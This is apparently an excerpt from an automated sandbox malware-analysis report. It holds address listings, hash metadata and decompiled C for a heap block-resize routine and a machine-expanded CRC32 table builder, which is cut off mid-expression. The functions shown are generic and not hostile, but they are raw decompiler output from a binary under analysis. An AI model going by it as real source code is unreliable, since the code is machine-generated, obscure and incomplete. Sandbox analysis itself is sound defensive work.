                              0x004126de
                              0x004126e3
                              0x004126ec
                              0x004126f6
                              0x0041271e
                              0x00412723
                              0x0041272a
                              0x004128b6
                              0x004128ba
                              0x004128be
                              0x004128c0
                              0x004128ca
                              0x004128d4
                              0x004128f0
                              0x004128f5
                              0x004128fc
                              0x0041291b
                              0x0041291d
                              0x0041291f
                              0x00412927
                              0x00412935
                              0x00412951
                              0x00412956
                              0x00412959
                              0x0041295f
                              0x004129c8
                              0x004129cc
                              0x004129ce
                              0x004129d8
                              0x004129e2
                              0x004129fe
                              0x00412a03
                              0x00412a0a
                              0x00412a10
                              0x00412a18
                              0x00412a1a
                              0x00412a22
                              0x00412a3e
                              0x00412a43
                              0x00412a48
                              0x00000000
                              0x00412a4a
                              0x00412a4a
                              0x00412a4a
                              0x00000000
                              0x00412a24
                              0x00412a28
                              0x00000000
                              0x00412a2e
                              0x00412a34
                              0x00412a37
                              0x00412a3a
                              0x00000000
                              0x00412a3a
                              0x00412a28
                              0x00412a0c
                              0x00412a0c
                              0x00000000
                              0x00412a0c
                              0x004129e4
                              0x004129e8
                              0x00000000
                              0x004129ee
                              0x004129f4
                              0x004129f7
                              0x004129f9
                              0x004129fa
                              0x00000000
                              0x004129fa
                              0x004129e8
                              0x00412961
                              0x00412969
                              0x0041296d
                              0x00412971
                              0x00412979
                              0x00412997
                              0x0041299c
                              0x004129a1
                              0x00412a4e
                              0x00412a4e
                              0x00412a50
                              0x00412a52
                              0x00412a56
                              0x00412a5a
                              0x00412a62
                              0x00000000
                              0x004129a7
                              0x004129ad
                              0x004129c5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004129ad
                              0x0041297b
                              0x0041297f
                              0x00000000
                              0x00412985
                              0x00412988
                              0x00412990
                              0x00412992
                              0x00412993
                              0x00000000
                              0x00412993
                              0x0041297f
                              0x00412979
                              0x00412937
                              0x0041293b
                              0x00000000
                              0x00412941
                              0x00412947
                              0x0041294a
                              0x0041294d
                              0x00000000
                              0x0041294d
                              0x0041293b
                              0x004128fe
                              0x004128fe
                              0x00412900
                              0x00412908
                              0x0041290e
                              0x00412a68
                              0x00412a68
                              0x00412a71
                              0x00412a8d
                              0x00412a92
                              0x00412a95
                              0x00412a9b
                              0x00412ab1
                              0x00412ab5
                              0x00412ab7
                              0x00412abf
                              0x00412adb
                              0x00412ae0
                              0x00412ae5
                              0x00412afd
                              0x00412aff
                              0x00412b01
                              0x00412b07
                              0x00412b0c
                              0x00412ae7
                              0x00412ae9
                              0x00412aee
                              0x00412af0
                              0x00412af7
                              0x00412af7
                              0x00000000
                              0x00412ac1
                              0x00412ac5
                              0x00000000
                              0x00412acb
                              0x00412ad1
                              0x00412ad4
                              0x00412ad6
                              0x00412ad7
                              0x00000000
                              0x00412ad7
                              0x00412ac5
                              0x00412a9d
                              0x00412a9f
                              0x00412aa1
                              0x00412aa5
                              0x00412aa7
                              0x00412b14
                              0x00412b14
                              0x00000000
                              0x00412b20
                              0x00412b26
                              0x00412b42
                              0x00412b4b
                              0x00412b50
                              0x00412b58
                              0x00412b5a
                              0x00412b5c
                              0x00412b52
                              0x00412b52
                              0x00412b54
                              0x00412b54
                              0x00412b60
                              0x00412b66
                              0x00412b70
                              0x00412b77
                              0x00000000
                              0x00412b7d
                              0x00412b80
                              0x00412b82
                              0x00412b82
                              0x00412b87
                              0x00412b8b
                              0x00412b92
                              0x00412b92
                              0x00412b99
                              0x00412ba0
                              0x00412ba0
                              0x00412baa
                              0x00000000
                              0x00412bac
                              0x00412bb0
                              0x00000000
                              0x00412bb6
                              0x00412bbd
                              0x00412bc0
                              0x00412bc2
                              0x00000000
                              0x00412bc2
                              0x00412bb0
                              0x00000000
                              0x00412bc3
                              0x00412bc8
                              0x00412bcd
                              0x00412bd5
                              0x00412bd7
                              0x00412bd9
                              0x00412bcf
                              0x00412bcf
                              0x00412bd1
                              0x00412bd1
                              0x00412bdd
                              0x00412be2
                              0x00412be8
                              0x00000000
                              0x00412bee
                              0x00412bf2
                              0x00412bf6
                              0x00412c15
                              0x00412c19
                              0x00412c20
                              0x00412c26
                              0x00000000
                              0x00412c28
                              0x00412c2a
                              0x00000000
                              0x00412c30
                              0x00412c37
                              0x00412c3a
                              0x00412c3c
                              0x00000000
                              0x00412c3c
                              0x00412c2a
                              0x00000000
                              0x00412c3d
                              0x00412c3d
                              0x00412c49
                              0x00412c4b
                              0x00412c4b
                              0x00412c58
                              0x00412c5c
                              0x00000000
                              0x00412bf8
                              0x00412c0f
                              0x00412c61
                              0x00412c61
                              0x00412c70
                              0x00412c74
                              0x00412c7e
                              0x00000000
                              0x00412c80
                              0x00412c84
                              0x00000000
                              0x00412c8a
                              0x00412c91
                              0x00412c94
                              0x00412c96
                              0x00000000
                              0x00412c96
                              0x00412c84
                              0x00000000
                              0x00412c97
                              0x00412c9c
                              0x00412ca1
                              0x00412ca9
                              0x00412cab
                              0x00412cad
                              0x00412ca3
                              0x00412ca3
                              0x00412ca5
                              0x00412ca5
                              0x00412cb1
                              0x00412cb1
                              0x00000000
                              0x00412cb4
                              0x00412bf6
                              0x00412be8
                              0x00412b68
                              0x00412b68
                              0x00000000
                              0x00412b68
                              0x00412b28
                              0x00412b2c
                              0x00000000
                              0x00412b32
                              0x00412b38
                              0x00412b3b
                              0x00412b3e
                              0x00000000
                              0x00412b3e
                              0x00412b2c
                              0x00000000
                              0x00412b26
                              0x00412b20
                              0x00412a73
                              0x00412a77
                              0x00000000
                              0x00412a7d
                              0x00412a83
                              0x00412a86
                              0x00412a89
                              0x00000000
                              0x00412a89
                              0x00412a77
                              0x00412a71
                              0x004128d6
                              0x004128da
                              0x00000000
                              0x004128e0
                              0x004128e6
                              0x004128e9
                              0x004128eb
                              0x004128ec
                              0x00000000
                              0x004128ec
                              0x004128da
                              0x00412730
                              0x00412730
                              0x0041273f
                              0x00412743
                              0x0041274b
                              0x00412750
                              0x00412752
                              0x00412752
                              0x00412782
                              0x00412782
                              0x00412789
                              0x0041281c
                              0x0041281f
                              0x00412824
                              0x0041282b
                              0x00412826
                              0x00412826
                              0x00412826
                              0x00412834
                              0x00412838
                              0x0041283d
                              0x00412842
                              0x00412846
                              0x0041284a
                              0x0041284c
                              0x0041285a
                              0x00412864
                              0x00000000
                              0x00000000
                              0x00412866
                              0x0041286e
                              0x00000000
                              0x00412874
                              0x0041287a
                              0x0041287d
                              0x00412880
                              0x00000000
                              0x00412880
                              0x00000000
                              0x00412884
                              0x00412889
                              0x00412890
                              0x0041289a
                              0x0041289c
                              0x0041289e
                              0x00412892
                              0x00412892
                              0x00412894
                              0x00412896
                              0x00412896
                              0x004128a2
                              0x004128aa
                              0x00000000
                              0x004128b0
                              0x004128b0
                              0x00000000
                              0x004128b0
                              0x00000000
                              0x004128aa
                              0x0041278f
                              0x0041278f
                              0x004127a0
                              0x004127a4
                              0x004127ae
                              0x00000000
                              0x004127b0
                              0x004127b0
                              0x004127b8
                              0x00000000
                              0x004127be
                              0x004127c4
                              0x004127c7
                              0x004127ca
                              0x00000000
                              0x004127ca
                              0x004127b8
                              0x00000000
                              0x004127ce
                              0x004127d3
                              0x004127d8
                              0x004127e0
                              0x004127e2
                              0x004127e4
                              0x004127da
                              0x004127da
                              0x004127dc
                              0x004127dc
                              0x004127e8
                              0x004127f0
                              0x004127f0
                              0x004127f8
                              0x004127f8
                              0x004127fc
                              0x00412802
                              0x00412819
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00412802
                              0x00412789
                              0x004126f8
                              0x004126f8
                              0x00412700
                              0x00412714
                              0x00412717
                              0x0041271a
                              0x00000000
                              0x00412705
                              0x00412705
                              0x0041270b
                              0x0041270b
                              0x00412700
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction ID: 16771a17edc265a66ec67cf10f30b53a928448ec08439b5136306a35d4d76ba5
                              • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction Fuzzy Hash: 3D023C72A042114BD719CE18C6802BDBBE2FBD5350F150A3FE4A6D7684D7B898E8C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004162A6 Relevance: .3, Instructions: 259COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004162A6(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}
























































                              0x004162ac
                              0x004162b5
                              0x004162c0
                              0x004162c3
                              0x004162c6
                              0x004162d8
                              0x004162de
                              0x004162e1
                              0x004162e4
                              0x004162e8
                              0x004162ec
                              0x004162ef
                              0x00416454
                              0x0041645a
                              0x0041645d
                              0x00416460
                              0x00416463
                              0x00416466
                              0x0041646d
                              0x00416473
                              0x00416474
                              0x00416477
                              0x0041647a
                              0x0041647e
                              0x0041647e
                              0x0041647f
                              0x00416483
                              0x0041648f
                              0x00416490
                              0x00416493
                              0x00416497
                              0x00416497
                              0x0041649b
                              0x0041649e
                              0x004164a0
                              0x004164a3
                              0x004164c3
                              0x004164cd
                              0x004164cd
                              0x004164d1
                              0x004164d3
                              0x004164da
                              0x004164da
                              0x004164dc
                              0x004164de
                              0x004164e1
                              0x004164e1
                              0x004164e1
                              0x004164e1
                              0x004164a5
                              0x004164ae
                              0x004164b2
                              0x004164b4
                              0x004164b8
                              0x004164b8
                              0x004164ba
                              0x004164bf
                              0x004164bf
                              0x004164ba
                              0x004164e4
                              0x004164e4
                              0x004164ed
                              0x004164f6
                              0x004164fc
                              0x004164ff
                              0x00416505
                              0x00416506
                              0x00416509
                              0x0041650d
                              0x0041650d
                              0x00416509
                              0x0041650e
                              0x00416515
                              0x00416518
                              0x0041651b
                              0x0041651e
                              0x00416524
                              0x0041652a
                              0x0041652d
                              0x0041652f
                              0x00416533
                              0x00416536
                              0x00416539
                              0x00416539
                              0x0041653b
                              0x0041653f
                              0x00416562
                              0x00416566
                              0x00416572
                              0x00416575
                              0x00416575
                              0x00416575
                              0x00416575
                              0x00416578
                              0x0041657f
                              0x00416582
                              0x00416541
                              0x00416541
                              0x00416545
                              0x00416550
                              0x00416553
                              0x00416553
                              0x00416553
                              0x00416555
                              0x00416559
                              0x0041655e
                              0x0041655e
                              0x00416589
                              0x00416589
                              0x00416589
                              0x0041658b
                              0x0041658e
                              0x00416590
                              0x00416590
                              0x00416594
                              0x00416596
                              0x00000000
                              0x00416596
                              0x004162f8
                              0x00000000
                              0x00416308
                              0x0041630e
                              0x00416312
                              0x00416315
                              0x00416319
                              0x0041631a
                              0x0041631a
                              0x00416323
                              0x00416328
                              0x00416356
                              0x0041635a
                              0x0041635c
                              0x00416363
                              0x00416363
                              0x00416365
                              0x00416367
                              0x0041636a
                              0x0041636a
                              0x0041636a
                              0x0041636a
                              0x0041632a
                              0x00416334
                              0x00416338
                              0x0041633a
                              0x0041633e
                              0x00416340
                              0x00416345
                              0x00416345
                              0x00416340
                              0x00416328
                              0x00416373
                              0x0041637c
                              0x00416384
                              0x0041638b
                              0x0041643b
                              0x00416391
                              0x0041639a
                              0x0041639b
                              0x004163a2
                              0x004163a6
                              0x004163a6
                              0x004163aa
                              0x004163ad
                              0x004163b3
                              0x004163b6
                              0x004163b9
                              0x004163bc
                              0x004163c2
                              0x004163cb
                              0x004163cd
                              0x004163d4
                              0x004163d7
                              0x004163d9
                              0x004163dd
                              0x00416400
                              0x00416404
                              0x00416406
                              0x00416410
                              0x00416413
                              0x00416413
                              0x00416413
                              0x00416413
                              0x00416416
                              0x0041641d
                              0x0041641d
                              0x00416420
                              0x004163df
                              0x004163e3
                              0x004163f1
                              0x004163f1
                              0x004163f3
                              0x004163f7
                              0x004163fc
                              0x004163fc
                              0x00416427
                              0x00416427
                              0x00416429
                              0x0041642c
                              0x0041642f
                              0x00416433
                              0x00416435
                              0x00416435
                              0x0041643e
                              0x00416441
                              0x00416444
                              0x00000000
                              0x00416444

                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
                              • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403A01 Relevance: .1, Instructions: 82COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00403A01() {
				void* _t37;
				signed int _t38;
				signed int _t72;

				_t72 = 0;
				do {
					 *(0x4236c0 + _t72 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 